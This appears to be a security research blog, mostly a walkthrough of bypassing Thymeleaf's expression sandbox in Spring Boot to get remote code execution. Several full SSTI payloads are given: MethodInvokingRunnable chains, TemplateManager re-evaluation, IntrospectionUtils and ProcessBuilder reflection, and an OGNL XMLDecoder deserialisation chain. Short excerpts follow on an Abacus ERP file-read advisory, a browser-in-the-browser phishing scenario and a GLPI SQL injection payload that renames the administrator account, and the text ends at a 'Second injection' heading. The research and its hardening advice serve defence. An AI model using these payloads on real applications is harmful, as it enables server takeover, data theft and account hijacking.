The Thymeleaf release version 3.0.12 came with improvements in its sandboxed evaluation process, by restricting objects creations and static function calls to be made from within the template. However, there is a specific attribute named with (see chapter 9. Local Variables) that still allows it. Although some restrictions are in place, I found a first way to bypass the controls of this semi-hardened context and obtain a command execution.

However, if the SSTI occur outside of this with attribute, the evaluation context would be much more restricted with no object creation nor static function calls allowed. The article Spring View Manipulation in Spring Boot 3.1.2 by Noventiq discusses some techniques, but they nowadays fail. It appeared that an attacker would be left with simple primitives and some objects exposed by the engine. The documentation lists some of them in 18 Appendix A: Expression Basic Objects and 19 Appendix B: Expression Utility Objects such as #ctx or #execInfo. The object #ctx (class org.thymeleaf.context.WebEngineContext) can be used to retrieve a reference to a TemplateManager instance (class org.thymeleaf.engine.TemplateManager), offering functions to evaluate templates. Then, the idea was to force the application to evaluate a new arbitrary inline template, containing a tag with a with attribute, therefore evaluating in a semi-hardened context. Injecting the first payload bypassing the semi-hardened context, I was then able to break outside the strongly sandboxed one.

The bottomline is that the #ctx object gives access to really powerful routines, and therefore makes it possible to perform an SSTI from the SSTI, and then turn it into an RCE.

Intro

Thymeleaf is the default templating engine of Spring Boot applications, making the view creation process highly customisable and smooth.

For this walkthrough we are going to create a basic application with the following dependencies:

<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
        <version>3.4.4</version>
    </dependency>

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-tomcat</artifactId>
        <scope>provided</scope>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-thymeleaf</artifactId>
    </dependency>
</dependencies>

The template is as follows, with a simple tag containing the infamous __...__ sequence (more about this later):

<html lang="en" xmlns:th="http://www.thymeleaf.org">
    <head>
        <meta charset="UTF-8" />
        <title>Document</title>
    </head>
    <body>
    [(__${p}__)]
    </body>
</html>>

and the Java class as follows, passing the user input as p:

package com.example.spring_boot_web;

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class MainController {

    @RequestMapping("/test")
    public String index(String p, Model m) throws Exception {
        m.addAttribute("p",p);
        return "index";
    }
}

Hardened and semi-hardened environments

SSTI in Thymeleaf may occur if the template content is built based on the user inputs, or if the latter is used within the preprocessing sequence __...__. This is a well known dangerous feature, as described for instance in the article Exploiting SSTI in Thymeleaf by Acunetix or Exploiting SSTI in a Modern Spring Boot Application (3.3.4) by ModZero. Every information put between these double underscores would be pre-processed, and its result would be considered as if it took part of the regular template. Obviously, if a user is able to inject malicious content within these preprocessing directives, it would be extremely dangerous. It was therefore known that the following template:

<p>[(__${userinput}__)]</p>

could be abused with a payload such as userinput=${T(java.lang.Runtime).getRuntime().exec('my-evil-command'))}. Indeed, the string ${T(java.lang.Runtime).getRuntime().exec('my-evil-command'))} would be processed, and therefore lead to command execution.

However, the release version 3.0.12 improved the security of the solution by denying arbitrary object creations and static functions calls from within the templates, canceling the effect of the previous payload. We are going to refer to it as a strongly hardened context.

However, these object creations and static functions calls are still possible within a specific attribute offered by Thymeleaf: th:with. The latter is meant to declare local variables from within the rendering process, that can be reused later on:

<p th:with="varName=__${userinput}__">Variable is: [(${varName})]</p>

Still, this context does not allow everything, and some restrictions are enforced, trying to prevent from dangerous classes and routines invocation. For instance, the whole package java.* is denied, except some basic types such as lists, strings, or numbers. Therefore, trying to invoke Runtime.exec or ProcessBuilder.start would fail (the section No RCE ? discusses some possibilities that exist, when RCE is not trivial). We are going to refer to this context as semi-hardened.

Breaking outside the semi-hardened context

At the beginning of this research, I found this really interesting article by Noventiq (as you probably also did if you were looking for information about SSTI in Thymeleaf), but their techniques did not work anymore against the version 3.1.3.RELEASE, the one I tested. Creating arbitrary classes with Class.forName was denied, and I did not want to assume the presence of some third-party libraries.

What is quite interesting to notice regarding the Thymeleaf’s filtering process is that it uses a denylist approach. In ExpressionUtils class, one can notice that the following packages are denied (except some basic classes):

This means that:

• The code of the application itself is not denied
• Lots of potential third-party libraries are allowed
• There are still numerous sub-packages of org.springframework that are allowed

Hunting for dangerous classes finally made me stumbled upon the package org.springframework.scheduling that did not belong to the denylist. This package contains the class MethodInvokingRunnable, a subclass or org.springframework.util.MethodInvoker. This handy class makes it possible to invoke member methods like this:

MethodInvokingRunnable m = new MethodInvokingRunnable();
m.setTargetObject(theObj);
m.setTargetMethod("the_method");
m.setArguments(arg1, arg2 …);
m.prepare();
m.invoke();

or static ones like this:

MethodInvokingRunnable m = new MethodInvokingRunnable();
m.setTargetClass(TheClass.class);
m.setStaticMethod("full.package.name.TheClass.the_method");
m.setArguments(arg1, arg2 …);
m.prepare();
m.invoke();

Then, it was quite clear that I could invoke Runtime.exec with these three steps:

• obtain a reference to the class java.lang.Runtime
• invoke the method getRuntime on it
• invoke the method exec with the expected arguments

Step 1 - Get a reference to Runtime

This can be done as follows, to invoke Class.forName:

MethodInvokingRunnable m = new MethodInvokingRunnable();
m.setTargetClass("".getClass());
m.setStaticMethod("java.lang.Class.forName");
m.setArguments("java.lang.Runtime");
m.prepare();
m.invoke();

Within the SSTI payload, one needs to store the m variable somehow, hence I used the setVariable and getVariable routines, as proposed by Noventiq. Quite ugly, but it works. It then gives us this, for this first sub-payload (spaces are new lines added for clarity’s sake):

${
    '' + #ctx.setVariable('a', new org.springframework.scheduling.support.MethodInvokingRunnable()) +
    #ctx.getVariable('a').setTargetClass(''.class) +
    #ctx.getVariable('a').setStaticMethod('java.lang.Class.forName') +
    #ctx.getVariable('a').setArguments('java.lang.Runtime') +
    #ctx.getVariable('a').prepare() +
    #ctx.setVariable('b', #ctx.getVariable('a').invoke())
}

Since we will use the values returned by Class.forName, we use another temporary variable (named here b).

Note: here, we use single quotes to write strings, to avoid the risk of breaking the injection

Step 2 - Invoking getRuntime

The process repeats here, to invoke getRuntime against the obtained class reference:

MethodInvokingRunnable m = new MethodInvokingRunnable();
m.setTargetClass(theClassReference);
m.setStaticMethod("java.lang.Runtime.getRuntime");
// no arguments for getRuntime
m.prepare();
m.invoke();

The SSTI payload then becomes:

${
    '' + #ctx.setVariable('a', new org.springframework.scheduling.support.MethodInvokingRunnable()) + 
    #ctx.getVariable('a').setTargetClass(''.class) + 
    #ctx.getVariable('a').setStaticMethod('java.lang.Class.forName') + 
    #ctx.getVariable('a').setArguments('java.lang.Runtime') + 
    #ctx.getVariable('a').prepare() +
    #ctx.setVariable('b', #ctx.getVariable('a').invoke())+

    #ctx.setVariable('c', new org.springframework.scheduling.support.MethodInvokingRunnable()) +
    #ctx.getVariable('c').setTargetClass(#ctx.getVariable('b')) + 
    #ctx.getVariable('c').setStaticMethod('java.lang.Runtime.getRuntime') + 
    #ctx.getVariable('c').prepare() +
    #ctx.setVariable('d', #ctx.getVariable('c').invoke())
}

The object returned by the first function call is stored as b and passed to the second one. The same principle will apply with the variable d.

Step 3 - Invoking exec

Doing it a third time led to exec invocation, in a semi-hardened context. Here, we invoke a member method, hence the use of setTargetObject and setTargetMethod instead of setTargetClass and setStaticMethod:

MethodInvokingRunnable m = new MethodInvokingRunnable();
m.setTargetObject(theRuntimeObj);
m.setTargetMethod("exec");
m.setArguments("touch /pwn");
m.prepare();
m.invoke();

By putting all the pieces together, we end up with this SSTI payload executing the command touch /pwn, valid in a semi-hardened context

${
    '' + #ctx.setVariable('a', new org.springframework.scheduling.support.MethodInvokingRunnable()) +
    #ctx.getVariable('a').setTargetClass(''.class) +
    #ctx.getVariable('a').setStaticMethod('java.lang.Class.forName') +
    #ctx.getVariable('a').setArguments('java.lang.Runtime') +
    #ctx.getVariable('a').prepare() +
    #ctx.setVariable('b', #ctx.getVariable('a').invoke()) + 
    
    #ctx.setVariable('c', new org.springframework.scheduling.support.MethodInvokingRunnable()) +
    #ctx.getVariable('c').setTargetClass(#ctx.getVariable('b')) +
    #ctx.getVariable('c').setStaticMethod('java.lang.Runtime.getRuntime') + 
    #ctx.getVariable('c').prepare() +
    #ctx.setVariable('d', #ctx.getVariable('c').invoke()) +
    
    #ctx.setVariable('e', new org.springframework.scheduling.support.MethodInvokingRunnable()) +
    #ctx.getVariable('e').setTargetObject(#ctx.getVariable('d')) +
    #ctx.getVariable('e').setTargetMethod('exec') +
    #ctx.getVariable('e').setArguments('touch /pwn') +
    #ctx.getVariable('e').prepare() +
    #ctx.getVariable('e').invoke()
}

Breaking outside a strongly hardened context

Injecting into a strongly hardened context makes the previous payload ineffective, because objects creation are now denied, and therefore preventing us from invoking new MethodInvokingRunnable. An attacker is left to the primitive types and a few exposed objects. Exploring a little bit what we can access reveals that we have the following exposed objects:

ctx, root, vars, object, locale, conversions, uris, temporals,
calendars, dates, bools, numbers, objects, strings, arrays, lists,
sets, maps, aggregates, messages, ids, execInfo, request, response,
session, servletContext, fields, themes, mvc, requestdatavalues

and the following populated variables, accessible through #ctx.getVariable (the p is the custom one injected from the Java side):

org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER,
org.springframework.web.servlet.HandlerMapping.bestMatchingHandler,
org.springframework.web.servlet.DispatcherServlet.CONTEXT,
thymeleaf::EvaluationContext,
org.springframework.web.servlet.resource.ResourceUrlProvider,
characterEncodingFilter.FILTERED,
org.springframework.web.util.ServletRequestPathUtils.PATH
org.springframework.web.servlet.DispatcherServlet.LOCALE_RESOLVER,
formContentFilter.FILTERED,
org.springframework.web.servlet.HandlerMapping.bestMatchingPattern,
requestContextFilter.FILTERED,
org.springframework.web.servlet.DispatcherServlet.OUTPUT_FLASH_MAP,
org.springframework.web.servlet.DispatcherServlet.FLASH_MAP_MANAGER,
org.springframework.core.convert.ConversionService,
org.springframework.web.servlet.View.selectedContentType,
org.springframework.web.servlet.HandlerMapping.matrixVariables,
errorPageFilterRegistration.FILTERED, thymeleafRequestContext,
org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE,
springMacroRequestContext,
p,
org.springframework.web.servlet.HandlerMapping.pathWithinHandlerMapping,
org.springframework.web.servlet.HandlerMapping.uriTemplateVariables,
springRequestContext,
org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER

One of these objects (or its aliases) is quite powerful, as it exposes some functions related to the templating engine itself: #ctx, being an instance of the class org.thymeleaf.context.WebEngineContext. A reference to the class TemplateManager can be obtained through the sequence #ctx.getConfiguration().getTemplateManager(). Taking a look at the documentation of this class reveals three valuable routines:

Then, an idea came to my mind: and what if we could leverage the first SSTI in a hardened context, to willingly ask the TemplateManager for the evaluation of a new arbitrary inline template, containing a th:with attribute, so as to inject our previous payload in a semi-hardened context ?

The idea was therefore to invoke first TemplateManager.parseString and use its result as a first argument for TemplateManager.process, hoping that it would lead to a breakout.

Invoking parseString

As a reminder, we can here only use the exposed objects and their methods. Then the expected arguments for parseString could be:

public TemplateHandler parseString(
    TemplateData ownerTemplateData,
    String template,
    int lineOffset,
    int colOffset,
    TemplateMode templateMode,
    boolean useCache);

• ownerTemplateData: reuse the one exposed by #ctx.getTemplateData(). It would be related to the first injected template, but it does not really matter
• template: the arbitrary inline template that we want to evaluate, with the th:with attribute. For the moment, it may be something like '<p th:with="x=${T(java.lang.Runtime)}">[(${x})]</p>'
• lineOffset and colOffset: may be set to 0, to process the whole template
• templateMode: we can reuse the one of the current context (TemplateMode.HTML in this case), with the call #ctx.getTemplateMode()
• useCache: set it to false to force re-processing

Therefore, the invocation from the SSTI payload looks like (spaces and new lines added for readability):

${
    #ctx.getConfiguration().getTemplateManager().parseString(
        #ctx.getTemplateData(),
        '<p+th:with="x=${T'%2b'(java.lang.Runtime)}">[(${x})]</p>',
        0,
        0,
        #ctx.getTemplateMode(),
        false
    )
}

One thing is important to notice here: to avoid triggering the expression filter too early, I split the template between the T and the (, supposed to refer to a class, generally used to perform a static method invocation (T(com.package.Class).method(...)). The %2b is a + symbol encoded as URL, performing a concatenation.

Invoking process

This one was trickier and took me time to solve. While the two first arguments are easy to obtain (previous method invocation and current context #ctx), the last one was quite hidden:

public void process(TemplateModel template, ITemplateContext context, Writer writer)

The argument writer should be an instance of an implementation of the interface java.io.Writer. At first glance, it seemed that no routine from #ctx would directly or indirectly return an instance of a Writer. Moreover, the objects #request, #response, #session and #servletContext are denied, although they are exposed by the engine. I knew that in older versions, it would have been easy to get a Writer from the #response, but now it is no more the case.

And finally, after a while, I found what I was looking for:

#ctx.getVariable('org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER').
getAsyncWebRequest().getNativeResponse().getWriter()

It is worth noting that process would not complain if the passed Writer is set to null, and specific paths are designed for such a case. But at one moment, it would fail because another member variable is set based on the existence of writer, and the absence of this variable (this.next in org.thymeleaf.engine.AbstractTemplateHandler) would then raise a NullPointerException, leading to an error.

Therefore, the payload becomes:

${
    #ctx.getConfiguration().getTemplateManager().process(
        #ctx.getConfiguration().getTemplateManager().parseString(
            #ctx.getTemplateData(),
            '<p+th:with="x=${T'%2b'(java.lang.Runtime)}">[(${x})]</p>',
            0,
            0,
            #ctx.getTemplateMode(),
            false),
        #ctx,
        #ctx.getVariable('org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER').getAsyncWebRequest().getNativeResponse().getWriter()
    )
}

Sending this as parameter p would make the application display the following message in its error logs:

Seeing such an error is actually good news for us, because it means that the engine complains about the fact that we try to get access to a forbidden class, from within a semi-hardened context. Otherwise, in a strongly hardened one, we would have received the other message stating that instantiation and static functions calls are denied. We then achieved the second breakout !

Complete breakout

Now, it is time to combine the two payloads, to leverage the double breakout ! To make things easier, I decided to pass the payload with the MethodInvokingRunnable as another POST parameter, to avoid bad escape sequences and early filter denial. Dynamically, the injected SSTI will retrieve the second parameter to build the inline template.

First parameter, as qwertz (URL-encoded, new lines added for readability):

qwertz=${
    '' %2b #ctx.setVariable('a',new+org.springframework.scheduling.support.MethodInvokingRunnable()) %2b
    #ctx.getVariable('a').setTargetClass(''.class) %2b
    #ctx.getVariable('a').setStaticMethod('java.lang.Class.forName') %2b
    #ctx.getVariable('a').setArguments('java.lang.Runtime') %2b
    #ctx.getVariable('a').prepare() %2b 
    #ctx.setVariable('b',#ctx.getVariable('a').invoke()) %2b
    #ctx.setVariable('c',new+org.springframework.scheduling.support.MethodInvokingRunnable()) %2b
    #ctx.getVariable('c').setTargetClass(#ctx.getVariable('b')) %2b
    #ctx.getVariable('c').setStaticMethod('java.lang.Runtime.getRuntime') %2b
    #ctx.getVariable('c').prepare() %2b
    #ctx.setVariable('d',#ctx.getVariable('c').invoke()) %2b
    #ctx.setVariable('e',new+org.springframework.scheduling.support.MethodInvokingRunnable()) %2b
    #ctx.getVariable('e').setTargetObject(#ctx.getVariable('d')) %2b
    #ctx.getVariable('e').setTargetMethod('exec') %2b
    #ctx.getVariable('e').setArguments('touch /pwn') %2b
    #ctx.getVariable('e').prepare() %2b
    #ctx.getVariable('e').invoke()
}

And then the p:

p=${
    #ctx.getConfiguration().getTemplateManager().process(
        #ctx.getConfiguration().getTemplateManager().parseString(
            #ctx.getTemplateData(),
            '<p+th:with="x='%2b#ctx.getVariable('org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER').getAsyncWebRequest().getNativeRequest().getParameter('qwertz')%2b'">[(${x})]</p>',
            0,
            0,
            #ctx.getTemplateMode(),
            false
        ),
        #ctx,
        #ctx.getVariable('org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER').getAsyncWebRequest().getNativeResponse().getWriter()
    )
}

Combining these two payloads then returns a concatenation of null values, which is intended (returned by the intermediate setVariable), but now, a file named pwn should be placed at the root of the filesystem (:

Bypassing Spring Boot web starter

Another approach could be used to escape the semi-hardened context, if the application uses the following dependency:

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>

This package gives access to two interesting classes offering reflection capabilities: org.apache.tomcat.util.IntrospectionUtils and org.apache.el.util.ReflectionUtil. Both do not belong to the denylist of ExpressionUtils, and can therefore be used to retrieve references to the ProcessBuilder class, and turn it into command execution.

Invoking callMethodN

The class IntrospectionUtils offers a series of interesting methods, including callMethodN:

static Object callMethodN​(
    Object target, //the subject
    String methodN, //the method 
    Object[] params, //array of params
    Class<?>[] typeParams); //same size, representing the types of the params

here, the idea was to leverage ProcessBuilder.start instead of Runtime.exec, because there was a catch. Taking a look at the method code, one can see that introspection is made to retrieve the method based on target’s class:

Then, if we want to invoke Runtime.exec, the first parameter must be an instance of java.lang.Runtime and not the Runtime class itself. Indeed, passing Runtime.class as the first argument would invoke getClass once again, and therefore look for Class.getRuntime which obviously does not exist. In other words, this technique is not really suitable for static methods invocation, hence the use of ProcessBuilder.

The steps where therefore as follows:

• retrieve a reference to the ProcessBuilder class
• from this class, retrieve its constructors
• invoke newInstance on a constructor to create a ProcessBuilder instance with the appropriate arguments
• then invoke start without arguments

Let’s see how it works.

Step 1 - Get a reference to java.lang.ProcessBuilder

From a Java point of view, the goal is to call Class.forName. As I wrote, static methods works quite bad, but here, I will pass a reference to String.class, and then getClass() from callMethodN will return the class Class, so it is fine. In Java, it could be something like:

Runtime.class = IntrospectionUtils.callMethodN(
    "".getClass(),
    "forName",
    new Object[]{"java.lang.Runtime"},
    new Class[]{String.class}
);

Within the SSTI payload, it is however quite different: how do we pass array, especially the 4th parameter, the arrays of types, since the sandbox denies the use of the generic type java.lang.Class ?

Actually, one could leverage here the power of the routine ReflectionUtil.toTypeArray​:

static Class<?>[] toTypeArray(​String[] s)

From an array of String representing the classes, it returns an array of type. For instance:

toTypeArray(new String[]["java.lang.Integer", "java.lang.String"]) 

returns:

Class[] types = new Class[]{Integer.class, String.class}

So now, the only thing to do is to pass array of Strings !

To keep it quite simple, I used here a small trick with the split routine to easily create array of strings, and avoid a cumbersome array creation process. The first SSTI payload then becomes:

${T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
    ''.class,
    'forName',
    'java.lang.ProcessBuilder'.split(';'),
    T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.String'.split(';'))
)}

Note: although there is only one parameter for Class.forName, the routine callMethodN expects arrays for the 3rd and 4th argument, hence the quite useless split invocations

Retrieve the constructors

Now, it is time to obtain the list of possible constructors supported by the class ProcessBuilder. Since getConstructors come from the class Class, we can invoke callMethodN by passing the reference to the class ProcessBuilder we just obtained.

In this case, ProcessBuilder supports two constructors:

public ProcessBuilder(List<String> args);
public ProcessBuilder(String[] args);

I decided to go with the second one, but they can be both used.

In Java, the invocation would look like this:

Constructor c = IntrospectionUtils.callMethodN(
    ProcessBuilder.class,
    "getConstructors",
    null,
    null
)[1];

Within an SSTI payload it would therefore be:

${T(org.apache.tomcat.util.IntrospectionUtils).callMethodN( theRuntimeClassRef ,'getConstructors',null,null)[1]}

By combining it with the payload of the previous step, we obtain:

${
    T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
        T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
            ''.class,
            'forName',
            'java.lang.ProcessBuilder'.split(';'),
            T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.String'.split(';'))),
        'getConstructors',
        null,
        null
    )[1]
}

Step 3 - Invoking the constructor

Once we select the second constructor (the one that takes an array of Strings as argument), we can invoke the routine newInstance on it. The latter takes as argument an array of objects, that are actually simply forwarded to the class’s constructor. In other words, we invoke newInstance how we would normally invoke the ProcessBuilder’s constructor:

public T newInstance(Object... initargs)
    throws InstantiationException,
            IllegalAccessException,
            IllegalArgumentException,
            InvocationTargetException

What is trickier here, is that the constructor expects an array of Strings, and then the invocation to callMethodN should be like this, with an array of Strings embedded in an array of Objects

ProcessBuilder p = theConstructor.newInstance(
    new Object[]{
        new String[]{
            "cmd", "arg1", ...
        }
    });

//then
ProcessBuilder p = IntrospectionUtils.callMethod(
    theConstructor,
    "newInstance",
    new Object[]{
        new Object[]{
            Arrays.asList("cmd", "arg1", "arg2", ...)
        }
    },
    new Class[]{Object[].class}
);

Quite ugly, but I first created the embedded arrays like this in the SSTI payload, chained with a concatenation operator:

#ctx.setVariable('a', 'mkdir;/pwn'.split(';')) +
#ctx.setVariable('b', new java.util.ArrayList()) + 
#ctx.getVariable('b').add(#ctx.getVariable('a')) + 
#ctx.setVariable('c', #ctx.getVariable('b').toArray()) + 
#ctx.setVariable('d', new java.util.ArrayList()) + 
#ctx.getVariable('d').add(#ctx.getVariable('c')) + 
#ctx.setVariable('e', #ctx.getVariable('d').toArray())

Then, it is possible to pass the variable e as argument for callMethodN:

${
    '' + #ctx.setVariable('a', 'mkdir;/pwn'.split(';')) +
    #ctx.setVariable('b',new java.util.ArrayList()) + 
    ctx.getVariable('b').add(#ctx.getVariable('a')) +
    #ctx.setVariable('c', #ctx.getVariable('b').toArray()) + 
    #ctx.setVariable('d', new java.util.ArrayList()) + 
    #ctx.getVariable('d').add(#ctx.getVariable('c')) + 
    #ctx.setVariable('e', #ctx.getVariable('d').toArray()) + 
    T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
        T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
            T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
                ''.class,
                'forName',
                'java.lang.ProcessBuilder'.split(';'),
                T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.String'.split(';'))
            ),
            'getConstructors',
            null,
            null
        )[1],
        'newInstance',
        #ctx.getVariable('e'),
        T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.Object[]'.split(';'))
    )
}

Invoke start

Finally, once we obtain a newly created ProcessBuilder instance, the same process repeats by invoking the start routine:

${
    ''+
    #ctx.setVariable('a','mkdir;/pwn'.split(';')) +
    #ctx.setVariable('b', new java.util.ArrayList()) +
    #ctx.getVariable('b').add(#ctx.getVariable('a')) +
    #ctx.setVariable('c', #ctx.getVariable('b').toArray()) +
    #ctx.setVariable('d',new java.util.ArrayList()) +
    #ctx.getVariable('d').add(#ctx.getVariable('c')) +
    #ctx.setVariable('e', #ctx.getVariable('d').toArray()) +
    T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
        T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
            T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
                T(org.apache.tomcat.util.IntrospectionUtils).callMethodN(
                    ''.class,
                    'forName',
                    'java.lang.ProcessBuilder'.split(';'),
                    T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.String'.split(';'))
                ),
                'getConstructors',
                null,
                null
            )[1],
            'newInstance',
            #ctx.getVariable('e'),
            T(org.apache.el.util.ReflectionUtil).toTypeArray('java.lang.Object[]'.split(';'))
        ),
        'start',
        null,
        null
    )
}

And that’s it!

Bypassing with ognl

Variable expressions in Thymeleaf are written in SpEL (Spring Expression Languages), a version of the OGNL language. When Thymeleaf is integrated to Spring Boot with appropriate starter modules, the OGNL support would be discarded, and SpEL used by default instead. However, if Thymeleaf is integrated to the Spring Framework with more manual configuration, then OGNL libraries may also be included. It appears that they also offer some breakout techniques.

Let’s give it a try with the following dependencies:

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-tomcat</artifactId>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>ognl</groupId>
            <artifactId>ognl</artifactId>
            <version>3.4.7</version>
        </dependency>

It should also be included if Thymeleaf is included like this instead:

<dependency>
    <groupId>org.thymeleaf</groupId>
    <artifactId>thymeleaf</artifactId>
    <version>3.1.3.RELEASE</version>
</dependency>

Basically, to invoke Runtime.getRuntime, one would write such a payload, leveraging the routine getValue(String expression, Object root):

${
    T(ognl.Ognl).getValue('@java.lang.Runtime@getRuntime()', null)
}

However, an error would be raised, since we are trying to obtain a reference to a forbidden class:

One can see that trying to execute Runtime.exec or ProcessBuilder.start would be denied, but the denylist is rather short and quite easy to bypass. I guess that there a numerous ways to achieve code execution, so I decided to pick one of the easiest: creating a java.beans.XMLDecoder arbitrary object and invoke an unsafe deserialisation (from SSTI to SSTI to unsafe deserialisation to RCE :laughing:)

There is still a little trick here: from within the OGNL expression, we will need to also pass some Strings for the XML stream (we would need it anyway to pass the commands). However, using single quotes would break the main payload, and using double ones would mess with the th:with attribute. However, we cannot simply escape these symbols, since the SpEL parser would complain about it:

A possible approach would be to use concatenation of Character.toString but it would be cumbersome, hence I decided to pass it as another POST parameter. So let’s split the payload:

XML stream to deserialise:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_102" class="java.beans.XMLDecoder">
    <object class="java.lang.Runtime" method="getRuntime">
        <void method="exec">
            <array class="java.lang.String" length="3">
                <void index="0">
                    <string>bash</string>
                </void>
                <void index="1">
                    <string>-c</string>
                </void>
                <void index="2">
                    <string>mkdir /pwn</string>
                </void>
            </array>
        </void>
    </object>
</java>

We will need to URL-encode it.

And then, finally:

${
    T(ognl.Ognl).getValue(
        '#xml = new java.beans.XMLDecoder(new java.io.ByteArrayInputStream(' +
        #ctx.getVariable('org.springframework.web.context.request.async.WebAsyncManager.WEB_ASYNC_MANAGER').getAsyncWebRequest().getNativeRequest().getParameter('payload') +
        '.getBytes())),#xml.readObject()',
    null)
}

No RCE ?

It is really frustrating, but sometimes, SSTI might not lead to RCE directly or indirectly thanks to reflection as we did. Still, should it happens, other ways are worth being explored, such as:

• trigger an unsafe deserialisation. For instance, the class org.springframework.core.serializer.DefaultDeserializer does not belong to the deny list, and could be invoked in this way:

${
    new org.springframework.core.serializer.DefaultDeserializer().deserialize(
        new org.springframework.core.io.ByteArrayResource(
            T(org.yaml.snakeyaml.external.biz.base64Coder.Base64Coder).decode('rO0ABXNyA...')
        ).getInputStream()
    )
}

• if JSP files can be interpreted, try to write one somewhere. There are numerous ways, depending on the available libraries. Here are two examples:
  • ch.qos.logback.core.util.FileUtil->copy(String src, String destination) to copy a file to another place (e.g. an uploaded one to a location where JSP are stored)
  • org.apache.commons.io.FileUtils->writeXXXX functions
• Additionally, there are multiple ways to read files stored on the local disk, containing juicy information
• if the application communicates with a database, and if the DBMS allows it, maybe try to execute command within an SQL query
• the package org.springframework.scripting.* is allowed. If engines are available, they might be a convenient way to get RCE

Recommendations

Of course, should an SSTI occur, it would be because of an improper user input handling, and a misuse of Thymeleaf. To better protect Spring applications, it is paramount to filter input and escape output. Information submitted by users should not be blindly reflected, especially in dangerous contexts.

On Thymeleaf’s side, it would be worth considering the facts that MethodInvokingRunnable should belong to the denylist, and #ctx less powerful. Still, a denylist approach would always be less effective that an allowlist. Denying all potentially dangerous third-party libraries of the world would be vain, for sure. Although one could consider that it is entirely up to the developers to properly use Thymeleaf, I already saw applications were adding new templates was a legitimate feature. It sounds like an SSTI-as-a-service, and therefore, if done on purpose, the sandboxing process is important and should be as strong as possible.

Abacus ERP is versions older than 2024.210.16036, 2023.205.15833, and 2022.105.15542 are affected by an authenticated arbitrary file read vulnerability. The latter makes a malicious user able to recover the JWT signing key by carefully crafting a malicious URL, and then forge arbitrary tokens to authenticate against the API as anyone else.

This vulnerability was discovered during a white-box audit, unveiling a flawed API route leading to an arbitrary file read, because of a user-controlled absolute path. By knowing the file path, an attacker could extract the JWT signing key, and forge authorisation tokens. It is worth noting that other elements must be known to make the attack successful.

Thanks to Nicolas who performed this test with me, and to the Abacus team for their cooperation !

Patched versions:

• >= 2024.210.16036
• >= 2023.205.15833
• >= 2022.205.15542

- testdeurdestylos

Unknown sender, but he opens it carefully. There is a link inside, but the URL seems to be legit, and curiosity makes him click on it. He lands on a really interesting website with cybersecurity news, and starts reading. But all of a sudden, his VPN goes down, and he needs to reconnect to not lose his work.

But in reality, the VPN connection is perfectly fine, and he just fell for a variant of the Browser-in-the-Browser attack. This time, the fake window does not simulate a new browser instance, it masquerades as another programme. In reality, everything happens within the web page, but that’s too late …

When it comes to input sanitisation, who is responsible, the function or the caller ? Or both ? And if no one does, hoping that the other one will do the job, who is to blame ? As CVE-2024-29889 was patched, I took a look at the commit. I saw that the inputs were escaped thanks to Sanitizer::sanitize before calling exportArrayToDb, being a wrapper for json_encode:

I then guessed that if there were other calls to exportArrayToDb without a sanitisation process, it could still lead to an injection.

First injection

Looking for the pattern => exportArrayToDB in the source code, returned a hit in SavedSearch::saveOrder.

public function saveOrder(array $items){
    if (count($items)) {
        $user               = new User();
        $personalorderfield = $this->getPersonalOrderField();

        $user->update(['id'      => Session::getLoginUserID(),
            $personalorderfield  => exportArrayToDB($items)
        ]);
        return true;
    }
    return false;
}

This routine can be called from an AJAX request (ajax/savedsearch.php):

if ($action == 'reorder') {
    $savedsearch->saveOrder($_POST['ids']);
    header("Content-Type: application/json; charset=UTF-8");
    echo json_encode(['res' => true]);
}

One can notice that $_POST['ids'] is supposed to be an array (supposedly containing integers, but without validity check). If $items (the argument passed to saveOrder) is indeed an array, it is passed to exportArrayToDB.

The resulting SQL query is as follows:

UPDATE `glpi_users` SET `privatebookmarkorder` = '["\\',`name`=char(0x70,0x77,0x6e) where `id`=2 -- -"]' WHERE `id` = '3'

-- or

UPDATE `glpi_users` SET `privatebookmarkorder` = '["\\',`name`=char(0x70,0x77,0x6e) where `id`=2

It updates that username of the administrator, turning it into ‘pwn’. Therefore, it could lead to an account takeover, by modifying the user’s password hash, or their password reset token.

But why does this happen ? Because when the application receives an input, it first tries to escape everything it can in $_GET or $_POST (in inc/includes.php), which means that a first backslash will be put before single quotes in any input. However, when passing the value through json_encode, the latter will escape the backslash, but not the single quote:

php > echo json_encode(["\'"]);
["\\'"]

Therefore, the single quote will be unescaped, hence possibly leading to an injection. In other words, calls to exportArrayToDb (and therefore json_encode) would cancel the effects of the first escaping process.

Second injection

